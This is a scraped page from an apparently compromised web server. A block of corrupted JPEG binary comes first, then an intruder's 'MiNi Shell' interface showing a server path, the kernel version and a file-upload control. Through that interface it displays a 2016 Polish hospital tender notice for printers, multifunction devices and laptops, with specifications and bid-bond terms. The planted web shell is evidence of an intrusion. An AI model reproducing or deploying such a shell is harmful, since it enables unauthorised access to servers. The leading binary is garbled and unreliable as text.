JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160630/113019-N-2016.html

<p class="kh_header"><b>Poznań: URZĄDZENIA DRUKUJĄCE I LAPTOPY - POWTÓRZENIE (Nr rejestru I/16/16)</b><br>
<b>Numer ogłoszenia: 113019 - 2016; data zamieszczenia: 30.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ortopedyczno-Rehabilitacyjny Szpital Kliniczny im. W. Degi UM im. Karola Marcinkowskiego w Poznaniu , ul. 28 Czerwca 1956 r. nr 135/147, 61-545 Poznań, woj. wielkopolskie, tel. 61 8310142, 8310242, faks 61 8310107.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orsk.ump.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> URZĄDZENIA DRUKUJĄCE I LAPTOPY - POWTÓRZENIE (Nr rejestru I/16/16).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu komputerowego: 
    	- drukarek  - 55 sztuk - PAKIET Nr 1;
- drukujących urządzeń wielofunkcyjnych   - 20 sztuk - PAKIET Nr 2;
- laptopów ze stacją dokującą i dwoma monitorami - 7 sztuk - PAKIET Nr 3.

Wymagania Zamawiającego:

1)	Zaoferowany sprzęt musi być fabrycznie nowy, nieużywany i nieregenerowany, o roku produkcji 2015 lub 2016. Powinien posiadać oznakowanie CE i deklarację zgodności wystawioną przez producenta sprzętu zgodnie z aktualnie obowiązującymi przepisami.

2)	Wykonawca zobowiązany jest  do przekazania Zamawiającemu dokumentów gwarancyjnych oraz, jeśli zapisy licencyjne tak stanowią, licencji na dostarczone wraz ze sprzętem komputerowym oprogramowanie. Czas trwania gwarancji: na cały asortyment min. 36 miesięcy.UWAGA! Uszkodzone dyski twarde nie będą odsyłane do Wykonawcy!

3)	Zamawiający wymaga, aby wykonawca zaproponował tylko jeden model (tj. każdy z dostarczonych egzemplarzy sprzętu musi być tego samego modelu).

4)	Zamawiający wymaga również aby wykonawca przedłożył  oświadczenie producenta zaoferowanego sprzętu komputerowego, iż Wykonawca jest uprawniony do dystrybucji zaoferowanego sprzętu. 
    
5)	Przedmiot zamówienia nie może mieć gorszych parametrów technicznych, aniżeli te opisane w poniższej tabeli:

PAKIET Nr 1 - Drukarka

Nazwa parametru:	Przykładowa konfiguracja:
Technologia	Druk laserowy monochromatyczny
Funkcje	DRUKOWANIE
Prędkość drukowania dla formatu A4 	Możliwe do osiągnięcia przynajmniej 38 str./min
Jakość druku 	1200 x 1200 dpi
Dostosowany do pracy w sieci	TAK, karta wewnętrzna - możliwość pracy z szybkością przynajmniej 100 mb-s
Pamięć	Min 128MB
Szybkość procesora	Min 1000 MHz
Czas wydruku pierwszej strony	Max 6,5 sek.
Porty	Hi-Speed USB 2.0
Druk dwustronny	TAK, automatyczny
Podajnik papieru	Min. 300 arkuszy (łączna pojemność podajnika głównego i ręcznego)
Języki drukowania	PCL6, PCL5e, Postscript 3 lub emulacja tychże
Standardowe wymiary nośników	A4; A5; A6; B5; koperty (C5, DL, B5)
Odbiornik papieru 	Min. 150 arkuszy
Wyświetlacz	LCD - wbudowany
Cykl roboczy - miesięczne dopuszczalne obciążenie - wydajność spodziewana w ciągu jednego miesiąca - stałe osiąganie takiego wyniku nie jest wymagane (wartość podawana przez producenta)	80 000 stron
Zalecany nakład miesięczny  zalecana liczba stron drukowanych w miesiącu (wartość podawana przez producenta)	4000 stron
Dostępność sterowników do następujących systemów operacyjnych:	WindowsR XP w wersji 32-bitowej; MicrosoftR WindowsR 7 w wersji 32-bitowej 64-bitowej i inne nowsze wersje systemu operacyjnego
Zużycie energii - średnie	Do 700W
Waga (z materiałami eksploatacyjnymi)	Do 12 kg
Wymiary	Do 400 x 400 x 300
Materiały eksploatacyjne	Możliwość zamontowania tonera min na 9000 stron
Inne wymagania:	płyta CD (sterowniki, oprogramowanie, instrukcja), kabel zasilania, przewód do transmisji USB min. 1,8 m.
Gwarancja	Min. 36 m-cy
usługi serwisowe (w tym gwarancyjne) świadczone w siedzibie Zamawiającego
zapewnienie sprzętu zastępczego na żądanie Zamawiającego



PAKIET Nr 2  - DRUKUJĄCE URZĄDZENIE WIELOFUNKCYJNE

Nazwa parametru:	Przykładowa konfiguracja:
Technologia	Druk laserowy monochromatyczny
Funkcje	drukowanie, kopiowanie, skanowanie w czerni i w kolorze
Prędkość drukowania dla formatu A4 	Możliwe do osiągnięcia przynajmniej 38 str.-min
Jakość druku 	Min 600 x 600 dpi
Dostosowany do pracy w sieci	TAK, karta wewnętrzna - możliwość pracy z szybkością przynajmniej 100 mb-s
Pamięć	Min 256MB
Szybkość procesora	Min 1000 MHz
Czas wydruku pierwszej strony	Max 9 sek.
Porty	Hi-Speed USB 2.0
Druk dwustronny	Tak, automatyczny
Podajnik dokumentów ADF	Min. 50 arkuszy
Podajnik papieru główny	Min. 250 arkuszy
Języki drukowania	PCL6, PCL5e, Postscript 3 lub emulacja tychże
Standardowe wymiary nośników	A4; A5; A6; B5; koperty (C5, DL, B5)
Nośniki	Papier: kolorowy, wysoko- i niskogramaturowy, zwykły, wstępnie zadrukowany, dziurkowany, ekologiczny, szorstki; koperty; przeźrocza; etykiety
Dodatkowe podajniki papieru	Możliwość rozbudowy o trzeci podajnik
Odbiornik papieru 	Min. 150 arkuszy
Wyświetlacz	Ekran dotykowy
Cykl roboczy , miesięczne dopuszczalne obciążenie , wydajność spodziewana w ciągu jednego miesiąca - stałe osiąganie takiego wyniku nie jest wymagane (wartość podawana przez producenta)	80 000 stron
Zalecany nakład miesięczny , zalecana liczba stron drukowanych w miesiącu (wartość podawana przez producenta)	4000 stron
Typ skanera	Płaski, z możliwością korzystania z głównego podajnika
Skanowanie dwustronne	TAK, automatyczne
Optyczna rozdzielczość skanowania 	Min. 600x600 dpi
Skanowanie w kolorze	TAK
Rozdzielczość kopiowania 	Min. 600x600 dpi
Szybkość kopiowania 	Możliwe do osiągnięcia przynajmniej 38 kopii min
Ilość kopii na arkusz	Do 4 kopii arkusz
Kopiowanie dwustronne	TAK, automatyczne
Dostępność sterowników do następujących systemów operacyjnych:	WindowsR XP w wersji 32-bitowej; MicrosoftR WindowsR 7 w wersji 32-bitowej 64-bitowej i inne nowsze wersje systemu operacyjnego
Materiały eksploatacyjne
	Możliwość zamontowania tonera min na 9000 stron
Inne wymagania:	płyta CD (sterowniki, oprogramowanie, instrukcja), kabel zasilania, przewód do transmisji USB min. 1,8 m.
Gwarancja	Min. 36 m-cy
usługi serwisowe (w tym gwarancyjne) świadczone w siedzibie Zamawiającego
zapewnienie sprzętu zastępczego na żądanie Zamawiającego



PAKIET Nr 3 - LAPTOP ZE STACJĄ DOKUJĄCĄ ORAZ DWOMA MONITORAMI

	a. parametry laptopa ze stacją dokującą

Nazwa komponentu	Wymagane minimalne parametry techniczne komputerów
Ekran	matryca 14,1 lub 14 z podświetleniem w technologii LED, powłoka antyrefleksyjna - rozdzielczość FHD 1920x1080 (matowa)
Chipset	dostosowany do zaoferowanego procesora
Płyta główna	zaprojektowana i wyprodukowana przez producenta komputera wyposażona w interfejsy SATA III (6Gb/s) do obsługi dysków twardych. 
Procesor	zaprojektowany do pracy w komputerach przenośnych procesor klasy x86, min. 2-rdzeniowy, zegar co najmniej 2,5GHz, pamięć cache L3 co najmniej 4 MB lub równoważny wydajnościowo osiągający wynik co najmniej 4300 pkt w teście PassMark CPU Mark (według wyników opublikowanych w serwisie  http: www.cpubenchmark.net)
Pamięć operacyjna	min 16GB, DDR3 lub DDR4, min. 1600MHz
Dysk twardy	dysk 1 - M.2 min 128GB wykonany w technologii Solid State Drive, rekomendowany przez producenta notebooka, zawierający partycję z systemem operacyjnym
Dysk 2 - HDD  min 1TB 2,5 cala
Karta graficzna	zintegrowana
Audio/Video	wbudowana karta muzyczna, zgodna z HD Audio, wbudowane głośniki stereo, wbudowany mikrofon, wbudowana kamera
Karta sieciowa	- 10/100/1000 - RJ 45 
- wbudowana karta sieciowa, pracująca w standardzie ac/a/b/g/n
Porty/złącza	min 3xUSB,  złącze słuchawek, VGA, RJ-45, czytnik kart multimedialnych (SD, MMC), złącze stacji dokującej, display port, smart card
Klawiatura	standardowa podświetlana
Bluetooth	wbudowany moduł Bluetooth
Napęd optyczny	Wbudowany lub bez napędu, ale tylko jeśli producent urządzenia nie przewidział w obudowie miejsca na napęd wbudowany
Bateria	bateria pozwalająca na nieprzerwaną pracę urządzenia min. 10 godz.
Zasilacz	Dwa zasilacze zewnętrzne o parametrach odpowiednio: do laptopa i stacji dokującej.
Stacja dokująca 	Złacza : D-Sub (VGA), 2xDisplayPort, min. 3x USB 3.0, min. 2x USB 2.0, RJ-45, zasilania, slot na linkę zabezpieczającą.
System operacyjny	Windows 10 Pro PL 64-bit z możliwością downgrade 
Certyfikaty i standardy 	-	powinien posiadać certyfikat Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z ww. systemem operacyjnym (załączyć wydruk ze strony Microsoft WHCL)
-	deklaracja zgodności CE
Inne	-	mysz na USB markowana przez producenta sprzętu 
Bezpieczeństwo 	-	złącze typu Kensington Lock
-	wbudowany czytnik linii papilarnych
-	układ szyfrowania TPM
-	czytnik smart Card
Gwarancja	- min. 36-miesięczna gwarancja producenta
- reakcja serwisu: NBD
- usługi serwisowe (w tym gwarancyjne) świadczone w siedzibie Zamawiającego
- pozostawianie dysków twardych u Zamawiającego w przypadku awarii komputera lub dysku twardego
- zapewnienie sprzętu zastępczego na żądanie Zamawiającego
- możliwość sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu jego numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela (serwis telefoniczny/dedykowana strona www)



	b. parametry monitora

Nazwa komponentu	Wymagane minimalne parametry techniczne komputerów
Ekran i przekątna	min. 23,8, ekran z powłoką refleksyjną (matowa)
Nominalna rozdzielczość	1920x1080
Ilość wyświetlanych kolorów 	16,7 mln. i mniej
Jasność	250cd m2 lub większa
Kontrast 	1000:1
Czas reakcji matrycy	7ms lub mniej
Kąt widzenia 	178-178 lub więcej
Wbudowanie głośniki	2 x 1W (lub wyższa moc); dopuszcza się również dedykowane przez producenta głośniki niewbudowane w sam monitor, pod warunkiem, iż głośniki te będą mocowane do obudowa monitora.  
USB Hub 	min 2xUSB
Złącza 	D-Sub x1
Display Port x1
HDMI x1
Podstawa ekranu	Regulacja - zakres
Wysokości : min 130 mm
pochylenia: -5 do 25 stopni
Obracanie (pivot): do  90 stopni
Przekręcania : -45 do 45 stopni
Kable 	1x D-sub 1x Display Port, HDMI, zasilający 
 Kolor obudowy	 Czarny, szary, srebrny
 Gwarancja	min. 36-miesięczna gwarancja producenta 
- reakcja serwisu: NBD
- usługi serwisowe (w tym gwarancyjne) świadczone w siedzibie Zamawiającego
- zapewnienie sprzętu zastępczego na żądanie Zamawiającego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.21.31.00-6, 30.23.13.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania ofertą. 
Wadium należy wnieść przed upływem terminu składania ofert. Wadium wniesione w formie pieniężnej winno wpłynąć na rachunek Zamawiającego przed upływem terminu składania ofert.
Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania!

Każda składana oferta musi być zabezpieczona wadium w wysokości:

Pakiet nr 1 - 1 000,00 zł (słownie: jeden  tysiąc 00/100 złotych);
Pakiet nr 2 -    600,00 zł  (słownie: sześćset 00/100 złotych);
Pakiet nr 3 - 1 000,00 zł  (słownie: jeden tysiąc 00/100 złotych).


Wadium może być wnoszone w jednej lub kilku następujących formach:
-	w pieniądzu;
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-	w gwarancjach bankowych;
-	w gwarancjach ubezpieczeniowych;
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42,  poz.275).

Wadium wnoszone w pieniądzu należy wpłacić przelewem na poniższy rachunek bankowy:

Bank Gospodarstwa Krajowego Oddział w Poznaniu 
06 1130 1088 0001 3005 4720 0001
z dopiskiem Wadium - I-16-16

Dowód wniesienia wadium w formie pieniężnej należy dołączyć do oferty. W przypadku wnoszenia wadium w innej formie kserokopię potwierdzenia Za zgodność z oryginałem należy dołączyć do oferty, natomiast oryginał potwierdzenia włożyć do koperty.

Zamawiający zwróci wadium: 
1.	wszystkim Wykonawcom niezwłocznie po unieważnieniu postępowania;
2.	wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza;
3.	niezwłocznie, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 

Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie punktu 2, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 

Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 

Zamawiający zatrzyma wadium wraz z odsetkami:
1.	jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
2.	jeżeli Wykonawca, którego oferta została wybrana: 
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań dotyczących niniejszego warunku. Spełnieniem warunku będzie złożenie przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnieniem warunku będzie posiadanie przez Wykonawcę doświadczenia w realizacji co najmniej: 
-	dla Pakietu nr 1 i nr 2:  minimum dwóch dostaw drukarek lub urządzeń drukujących w ilości minimum 20 szt. każda o wartości nie mniejszej niż 25 000,00  złotych brutto;
-	dla Pakietu nr 3:  minimum dwóch dostaw na min. 4 laptopy każda o wartości nie mniejszej niż 25 000,00 złotych brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań dotyczących niniejszego warunku. Spełnieniem warunku będzie złożenie przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań dotyczących niniejszego warunku. Spełnieniem warunku będzie złożenie przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań dotyczących niniejszego warunku. Spełnieniem warunku będzie złożenie przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Oświadczenie producenta lub jego przedstawiciela stwierdzające na jego wyłączną odpowiedzialność, że oferowany sprzęt posiada oznakowanie CE oraz deklarację zgodności z dyrektywą dotyczącą kompatybilności elektromagnetycznej (EMC 2004/108/WE) oraz dyrektywą dotyczącą niskonapięciowych wyrobów elektrycznych (2006/95/WE);

2)	Oświadczenie producenta zaoferowanego sprzętu komputerowego, iż Wykonawca jest uprawniony do dystrybucji zaoferowanego sprzętu. 

3)	Potwierdzony za zgodność z oryginałem wydruk ze strony http://www.cpubenchmark.net potwierdzający spełnienie wymogów SIWZ w zakresie PassMark CPU. 
   (dotyczy Pakietu nr 3).

4)	Potwierdzony za zgodność z oryginałem wydruk ze strony typu Microsoft WHCL (Certyfikat Microsoft) potwierdzający poprawną współpracę oferowanego sprzętu z wymaganym systemem operacyjnym (dotyczy Pakietu nr 3)</p></li>



